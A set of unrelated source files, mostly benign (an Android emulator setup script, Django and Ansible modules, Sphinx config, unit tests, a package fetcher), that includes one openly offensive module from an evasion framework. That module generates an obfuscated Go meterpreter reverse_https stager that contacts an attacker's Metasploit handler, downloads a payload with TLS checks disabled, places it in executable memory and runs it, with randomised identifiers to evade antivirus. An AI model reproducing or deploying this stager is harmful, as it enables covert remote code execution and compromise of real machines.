elif system == 'Windows':
for path in [os.path.join(sdk, 'emulator', 'emulator.exe'),
os.path.join(sdk, 'tools', 'emulator.exe')]:
if os.path.exists(path):
return path
return False
def find_adb_binary(sdk):
system = platform.system()
if system in ['Darwin', 'Linux']:
guess = os.path.join(sdk, 'platform-tools', 'adb')
if os.path.exists(guess):
return guess
elif system == 'Windows':
guess = os.path.join(sdk, 'platform-tools', 'adb.exe')
if os.path.exists(guess):
return guess
return False
def find_skin(sdk):
# Just a basic check
system = platform.system()
if system == 'Darwin':
guess = r'/Applications/Android Studio.app/Contents/plugins/android/lib/device-art-resources/nexus_5'
if os.path.exists(guess):
return guess
elif system in ['Windows', 'Linux']:
guess = os.path.join(sdk, 'skins', 'nexus_5')
if os.path.exists(guess):
return guess
return False
def is_file_exists(file_path):
"""Check if File Exists"""
return bool(os.path.isfile(file_path))
# returns an array of [str(tabs_string), str(rest_of_the_string)]
def split_tabs(inp_string):
rgx = re.compile(r"([\s]+)(.*)")
match = rgx.match(inp_string)
if match:
return [match.group(1), match.group(2)]
else:
return ['', inp_string]
# path to modify, replace dict = {'field_to_replace1':'value1',
# 'field_to_replace2': 'value2'}
def replace_values_by_fieldnames(path, replace_dict):
replaced_lines = []
with io.open(path, mode='r', encoding="utf8", errors="ignore") as fild:
for line in fild.readlines():
tmp_line = line
if path.endswith('.py'):
tabs_and_str = split_tabs(line)
for field_to_replace in list(replace_dict.keys()):
# Python files has annoying tabs that we should consider
if path.endswith('.py'):
if tabs_and_str[1].lower().startswith(field_to_replace.lower()):
tmp_line = tabs_and_str[0] + field_to_replace + " = r\"" + replace_dict[
field_to_replace].strip(" \"'").lstrip("r\"") + "\"\n"
else:
if line.startswith(field_to_replace + '='):
tmp_line = field_to_replace + '=' + \
replace_dict[field_to_replace].strip() + '\n'
replaced_lines.append(tmp_line)
with io.open(path, 'w') as fild:
# newlines are validated before
fild.write(string.join(replaced_lines, ''))
def main():
sdk_path = ''
avd_path = ''
adb_path = ''
emulator_binary = ''
mobsf_arm_folder = ''
settings_py = ''
print("\nMobSFy_AVD Script\n\n")
print_log('Starting MobSF - AVD interactive configuration script')
print_log('Make sure to run this script ONLY after you successfuly installed latest AndroidStudio & downloaded MobSF_ARM_Emulator.zip')
# First gather all the paths needed to make to copy opera
print_log('Please specify the path to MobSF_ARM_Emulator extracted folder')
mobsf_arm_folder = verify_path('MobSF_ARM_Emulator folder')
# Give the user the ability to change the sdk and avd folder, let me guess
# the other tools
print_log('This script will overwrite any previously generated files.')
guessd_sdk_path = guess_android_sdk_folder()
if guessd_sdk_path:
user_approve = input(
"Guessing Android sdk path: " + guessd_sdk_path + '\n Press Enter/alternative path')
if user_approve.strip() == '':
sdk_path = guessd_sdk_path
elif os.path.exists(user_approve):
sdk_path = user_approve
if not sdk_path:
sdk_path = verify_path('Android SDK path')
guessd_avd_path = guess_android_avd_folder()
if guessd_avd_path:
user_approve = input(
"Guessing Android AVD folder: " + guessd_avd_path + '\n Press Enter/alternative path')
if user_approve.strip() == '':
avd_path = guessd_avd_path
elif os.path.exists(user_approve):
avd_path = user_approve
if not avd_path:
avd_path = verify_path('Android AVD path')
emulator_binary = find_emulator_binary(sdk_path)
if not emulator_binary:
emulator_binary = verify_path('emulator binary')
adb_path = find_adb_binary(sdk_path)
if not adb_path:
adb_path = verify_path('adb binary')
settings_py = os.path.join(BASE_DIR, 'MobSF', 'settings.py')
if not os.path.exists(settings_py):
settings_py = verify_path('MobSF/settings.py file')
skin_path = find_skin(sdk_path)
if not skin_path:
skin_path = verify_path('nexus 5 skin path')
print_log('Finished finding all the paths needed')
################## Copy the downloaded emulator and system image #########
emulator_avd = os.path.join(mobsf_arm_folder, 'Nexus5API16.avd')
emulator_ini = os.path.join(mobsf_arm_folder, 'Nexus5API16.ini')
new_emulator_avd = os.path.join(avd_path, 'Nexus5API16.avd')
new_emulator_ini = os.path.join(avd_path, 'Nexus5API16.ini')
print_log('Copying emulator files to avd folder: ' + avd_path)
if is_file_exists(new_emulator_ini):
print_log("Replacing old Emulator INI")
os.remove(new_emulator_ini)
shutil.copyfile(emulator_ini, new_emulator_ini)
if os.path.isdir(new_emulator_avd):
print_log("Replacing old Emulator AVD")
shutil.rmtree(new_emulator_avd)
shutil.copytree(emulator_avd, new_emulator_avd)
system_images = os.path.join(sdk_path, 'system-images')
xposed_image_path = os.path.join(system_images, 'Xposed-android-16')
downloaded_xposed_image = os.path.join(
mobsf_arm_folder, 'Xposed-android-16')
if os.path.isdir(xposed_image_path):
print_log("Replacing old Xposed image")
shutil.rmtree(xposed_image_path)
shutil.copytree(downloaded_xposed_image, xposed_image_path)
################## Modify all the config files ###########################
print_log('Modifying config files')
# Nexus5API16.ini
replace_values_by_fieldnames(new_emulator_ini, {
'path': new_emulator_avd,
'skin.path': skin_path
})
# Nexus5API16.avd/config.ini
replace_values_by_fieldnames(os.path.join(new_emulator_avd, 'config.ini'), {
'skin.path': skin_path
})
# Nexus5API16.avd/hardware-qemu.ini
replace_values_by_fieldnames(os.path.join(new_emulator_avd, 'hardware-qemu.ini'), {
'hw.sdCard.path': os.path.join(new_emulator_avd, 'sdcard.img'),
'disk.cachePartition.path': os.path.join(new_emulator_avd, 'cache.img'),
'kernel.path': os.path.join(xposed_image_path, 'kernel-qemu'),
'disk.ramdisk.path': os.path.join(xposed_image_path, 'ramdisk.img'),
'disk.systemPartition.initPath': os.path.join(xposed_image_path, 'system.img'),
'disk.dataPartition.path': os.path.join(new_emulator_avd, 'userdata.img'),
})
replace_values_by_fieldnames(settings_py, {
'AVD_EMULATOR': emulator_binary,
'AVD_PATH': avd_path,
'ADB_BINARY': 'r"' + adb_path + '"'
})
print("\n\nAll Done! you can now use MobSF AVD Emulator :)\n\n")
if __name__ == '__main__':
sys.exit(main())
|
spasovski/zamboni | refs/heads/master | apps/applications/management/commands/addnewversion.py | 6 | from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
import commonware.log
import amo.models
from applications.models import AppVersion
class Command(BaseCommand):
help = ('Add a new version to a Application. Syntax: \n'
' ./manage.py addnewversion <application_name> <version>')
log = commonware.log.getLogger('z.appversions')
def handle(self, *args, **options):
try:
do_addnewversion(args[0], args[1])
except IndexError:
raise CommandError(self.help)
msg = 'Adding version %r to application %r\n' % (args[1], args[0])
self.log.info(msg)
self.stdout.write(msg)
def do_addnewversion(application, version):
if application not in amo.APPS:
raise CommandError('Application %r does not exist.' % application)
try:
AppVersion.objects.create(application_id=amo.APPS[application].id,
version=version)
except IntegrityError, e:
raise CommandError('Version %r already exists: %r' % (version, e))
|
yfried/ansible | refs/heads/devel | lib/ansible/modules/network/f5/bigip_software_update.py | 11 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_software_update
short_description: Manage the software update settings of a BIG-IP
description:
- Manage the software update settings of a BIG-IP.
version_added: 2.5
options:
auto_check:
description:
- Specifies whether to automatically check for updates on the F5
Networks downloads server.
type: bool
auto_phone_home:
description:
- Specifies whether to automatically send phone home data to the
F5 Networks PhoneHome server.
type: bool
frequency:
description:
- Specifies the schedule for the automatic update check.
choices:
- daily
- monthly
- weekly
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Enable automatic update checking
bigip_software_update:
auto_check: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Disable automatic update checking and phoning home
bigip_software_update:
auto_check: no
auto_phone_home: no
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
auto_check:
description: Whether the system checks for updates automatically.
returned: changed
type: bool
sample: True
auto_phone_home:
description: Whether the system automatically sends phone home data.
returned: changed
type: bool
sample: True
frequency:
description: Frequency of auto update checks
returned: changed
type: string
sample: weekly
'''
from ansible.module_utils.basic import AnsibleModule
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
class Parameters(AnsibleF5Parameters):
api_map = {
'autoCheck': 'auto_check',
'autoPhonehome': 'auto_phone_home'
}
api_attributes = [
'autoCheck', 'autoPhonehome', 'frequency',
]
updatables = [
'auto_check', 'auto_phone_home', 'frequency',
]
returnables = [
'auto_check', 'auto_phone_home', 'frequency',
]
class ApiParameters(Parameters):
@property
def auto_check(self):
if self._values['auto_check'] is None:
return None
return self._values['auto_check']
class ModuleParameters(Parameters):
@property
def auto_check(self):
if self._values['auto_check'] is None:
return None
elif self._values['auto_check'] is True:
return 'enabled'
else:
return 'disabled'
@property
def auto_phone_home(self):
if self._values['auto_phone_home'] is None:
return None
elif self._values['auto_phone_home'] is True:
return 'enabled'
else:
return 'disabled'
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
@property
def auto_check(self):
if self._values['auto_check'] == 'enabled':
return True
elif self._values['auto_check'] == 'disabled':
return False
@property
def auto_phone_home(self):
if self._values['auto_phone_home'] == 'enabled':
return True
elif self._values['auto_phone_home'] == 'disabled':
return False
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.have = None
self.want = ModuleParameters(params=self.module.params)
self.changes = UsableChanges()
def exec_module(self): # lgtm [py/similar-function]
result = dict()
changed = self.update()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/sys/software/update/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/sys/software/update/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
auto_check=dict(
type='bool'
),
auto_phone_home=dict(
type='bool'
),
frequency=dict(
choices=['daily', 'monthly', 'weekly']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
|
marrocamp/V-u-Evasion- | refs/heads/master | modules/payloads/go/meterpreter/rev_https.py | 8 | """
Custom-written pure go meterpreter/reverse_https stager.
Module built by @b00stfr3ak44
"""
from modules.common import helpers
from random import randint
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
self.language = "Go"
self.extension = "go"
self.rating = "Normal"
# options we require user ineraction for- format is {Option : [Value, Description]]}
self.required_options = {
"LHOST" : ["", "IP of the Metasploit handler"],
"LPORT" : ["8443", "Port of the Metasploit handler"],
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
}
def generate(self):
memCommit = helpers.randomString()
memReserve = helpers.randomString()
pageExecRW = helpers.randomString()
kernel32 = helpers.randomString()
procVirtualAlloc = helpers.randomString()
base64Url = helpers.randomString()
virtualAlloc = helpers.randomString()
size = helpers.randomString()
addr = helpers.randomString()
err = helpers.randomString()
randBase = helpers.randomString()
length = helpers.randomString()
foo = helpers.randomString()
random = helpers.randomString()
outp = helpers.randomString()
i = helpers.randomString()
randTextBase64URL= helpers.randomString()
getURI = helpers.randomString()
sumVar = helpers.randomString()
checksum8 = helpers.randomString()
uri = helpers.randomString()
value = helpers.randomString()
tr = helpers.randomString()
client = helpers.randomString()
hostAndPort = helpers.randomString()
port = self.required_options["LPORT"][0]
host = self.required_options["LHOST"][0]
response = helpers.randomString()
uriLength = randint(5, 255)
payload = helpers.randomString()
bufferVar = helpers.randomString()
x = helpers.randomString()
payloadCode = "package main\nimport (\n\"crypto/tls\"\n\"syscall\"\n\"unsafe\"\n"
payloadCode += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n)\n"
payloadCode += "const (\n"
payloadCode += "%s = 0x1000\n" %(memCommit)
payloadCode += "%s = 0x2000\n" %(memReserve)
payloadCode += "%s = 0x40\n)\n" %(pageExecRW)
payloadCode += "var (\n"
payloadCode += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" %(kernel32)
payloadCode += "%s = %s.NewProc(\"VirtualAlloc\")\n" %(procVirtualAlloc, kernel32)
payloadCode += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n)\n" %(base64Url)
payloadCode += "func %s(%s uintptr) (uintptr, error) {\n" %(virtualAlloc, size)
payloadCode += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" %(addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
payloadCode += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" %(addr, err, addr)
payloadCode += "func %s(%s int, %s []byte) string {\n" %(randBase, length, foo)
payloadCode += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" %(random)
payloadCode += "var %s []byte\n" %(outp)
payloadCode += "for %s := 0; %s < %s; %s++ {\n" %(i, i, length, i)
payloadCode += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" %(outp, outp, foo, random, foo)
payloadCode += "return string(%s)\n}\n" %(outp)
payloadCode += "func %s(%s int) string {\n" %(randTextBase64URL, length)
payloadCode += "%s := []byte(%s)\n" %(foo, base64Url)
payloadCode += "return %s(%s, %s)\n}\n" %(randBase, length, foo)
payloadCode += "func %s(%s, %s int) string {\n" %(getURI, sumVar, length)
payloadCode += "for {\n%s := 0\n%s := %s(%s)\n" %(checksum8, uri, randTextBase64URL, length)
payloadCode += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" %(value, uri, checksum8, value)
payloadCode += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" %(checksum8, '%0x100', sumVar, uri)
payloadCode += "func main() {\n"
payloadCode += "%s := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}\n" %(tr)
payloadCode += "%s := http.Client{Transport: %s}\n" %(client, tr)
payloadCode += "%s := \"https://%s:%s\"\n" %(hostAndPort, host, port)
payloadCode += "%s, _ := %s.Get(%s + %s(92, %s))\n" %(response, client, hostAndPort, getURI, uriLength)
payloadCode += "defer %s.Body.Close()\n" %(response)
payloadCode += "%s, _ := ioutil.ReadAll(%s.Body)\n" %(payload, response)
payloadCode += "%s, _ := %s(uintptr(len(%s)))\n" %(addr, virtualAlloc, payload)
payloadCode += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr)
payloadCode += "for %s, %s := range %s {\n" %(x, value, payload)
payloadCode += "%s[%s] = %s\n}\n" %(bufferVar, x, value)
payloadCode += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" %(addr)
return payloadCode
|
UDST/pandana | refs/heads/pyproject.toml | docs/source/conf.py | 1 | # -*- coding: utf-8 -*-
#
# pandana documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 18 15:50:17 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
numpydoc_show_class_members = False
numpydoc_class_members_toctree = False
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.mathjax',
'numpydoc',
'sphinx.ext.autosummary'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'pandana'
copyright = '2021, UrbanSim Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.6.1'
# The full version, including alpha/beta/rc tags.
release = '0.6.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pandanadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'pandana.tex', 'pandana Documentation', 'UrbanSim Inc.', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pandana', 'pandana Documentation',
['UrbanSim Inc.'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pandana', 'pandana Documentation',
'UrbanSim Inc.', 'pandana', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
|
christoph-buente/phantomjs | refs/heads/master | src/qt/qtwebkit/Tools/QueueStatusServer/model/queues_unittest.py | 123 | # Copyright (C) 2010 Google, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Research in Motion Ltd. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from model.queues import Queue
class QueueTest(unittest.TestCase):
def test_is_ews(self):
mac_ews = Queue("mac-ews")
self.assertTrue(mac_ews.is_ews())
def test_queue_with_name(self):
self.assertEqual(Queue.queue_with_name("bogus"), None)
self.assertEqual(Queue.queue_with_name("mac-ews").name(), "mac-ews")
self.assertRaises(AssertionError, Queue, ("bogus"))
def _assert_short_name(self, queue_name, short_name):
self.assertEqual(Queue(queue_name).short_name(), short_name)
def test_short_name(self):
self._assert_short_name("mac-ews", "Mac")
self._assert_short_name("commit-queue", "Commit")
self._assert_short_name("style-queue", "Style")
def _assert_display_name(self, queue_name, short_name):
self.assertEqual(Queue(queue_name).display_name(), short_name)
def test_display_name(self):
self._assert_display_name("mac-ews", "Mac EWS")
self._assert_display_name("commit-queue", "Commit Queue")
self._assert_display_name("style-queue", "Style Queue")
def _assert_name_with_underscores(self, queue_name, short_name):
self.assertEqual(Queue(queue_name).name_with_underscores(), short_name)
def test_name_with_underscores(self):
self._assert_name_with_underscores("mac-ews", "mac_ews")
self._assert_name_with_underscores("commit-queue", "commit_queue")
def test_style_queue_is_ews(self):
# For now we treat the style-queue as an EWS since most users would
# describe it as such. If is_ews() ever needs to mean "builds the patch"
# or similar, then we will need to adjust all callers.
self.assertTrue(Queue("style-queue").is_ews())
self.assertTrue("style-queue" in map(Queue.name, Queue.all_ews()))
if __name__ == '__main__':
unittest.main()
|
AMDmi3/repology | refs/heads/master | repology/fetchers/fetchers/aur.py | 2 | # Copyright (C) 2016-2019 Dmitry Marakasov <[email protected]>
#
# This file is part of repology
#
# repology is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# repology is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with repology. If not, see <http://www.gnu.org/licenses/>.
import os
import urllib
from typing import Iterable, Iterator, Optional, Tuple
from repology.atomic_fs import AtomicDir
from repology.fetchers import PersistentData, ScratchDirFetcher
from repology.fetchers.http import PoliteHTTP
from repology.logger import Logger
def _split_names_into_urls(prefix: str, package_names: Iterable[str], maxlen: int) -> Iterator[Tuple[str, int]]:
url_parts = [prefix]
url_length = len(prefix)
for name in package_names:
newpart = '&arg[]=' + urllib.parse.quote(name)
if url_length + len(newpart) > maxlen:
yield ''.join(url_parts), len(url_parts) - 1
url_parts = [prefix, newpart]
url_length = sum(map(len, url_parts))
else:
url_parts.append(newpart)
url_length += len(newpart)
if len(url_parts) > 1:
yield ''.join(url_parts), len(url_parts) - 1
class AURFetcher(ScratchDirFetcher):
def __init__(self, url: str, fetch_timeout: int = 5, fetch_delay: Optional[int] = None, max_api_url_length: int = 4443) -> None:
self.url = url
self.do_http = PoliteHTTP(timeout=fetch_timeout, delay=fetch_delay)
self.max_api_url_length = max_api_url_length # see https://wiki.archlinux.org/index.php/Aurweb_RPC_interface#Limitations
def _do_fetch(self, statedir: AtomicDir, persdata: PersistentData, logger: Logger) -> bool:
packages_url = self.url + 'packages.gz'
logger.get_indented().log('fetching package list from ' + packages_url)
data = self.do_http(packages_url).text # autogunzipped?
package_names = []
for line in data.split('\n'):
line = line.strip()
if line.startswith('#') or line == '':
continue
package_names.append(line)
if not package_names:
raise RuntimeError('Empty package list received, refusing to continue')
logger.get_indented().log('{} package name(s) parsed'.format(len(package_names)))
for num_page, (url, num_packages) in enumerate(_split_names_into_urls(self.url + '/rpc/?v=5&type=info', package_names, self.max_api_url_length)):
logger.get_indented().log('fetching page {} of {} package(s)'.format(num_page + 1, num_packages))
with open(os.path.join(statedir.get_path(), '{}.json'.format(num_page)), 'wb') as statefile:
statefile.write(self.do_http(url).content)
statefile.flush()
os.fsync(statefile.fileno())
return True
|
mrry/tensorflow | refs/heads/windows | tensorflow/python/kernel_tests/matrix_band_part_op_test.py | 21 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class MatrixBandPartTest(tf.test.TestCase):
